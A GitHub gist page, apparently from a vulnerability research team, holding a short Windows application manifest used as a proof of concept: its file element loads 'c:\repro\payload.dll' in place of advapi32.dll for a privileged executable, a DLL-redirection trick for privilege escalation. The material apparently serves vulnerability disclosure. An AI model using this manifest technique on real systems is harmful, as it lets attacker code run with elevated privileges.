Skip to content

Instantly share code, notes, and snippets.

@zdi-team
Created January 20, 2023 21:01
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save zdi-team/b2a05a7f130026334af7e4a3ca39be8a to your computer and use it in GitHub Desktop.
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity name="SomePrivilegedExecutable" processorArchitecture="amd64" version="1.0.0.0" type="win32"/>
<description>Windows Shell</description>
<file loadFrom="c:\repro\payload.dll" name="advapi32.dll"/>
</assembly>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment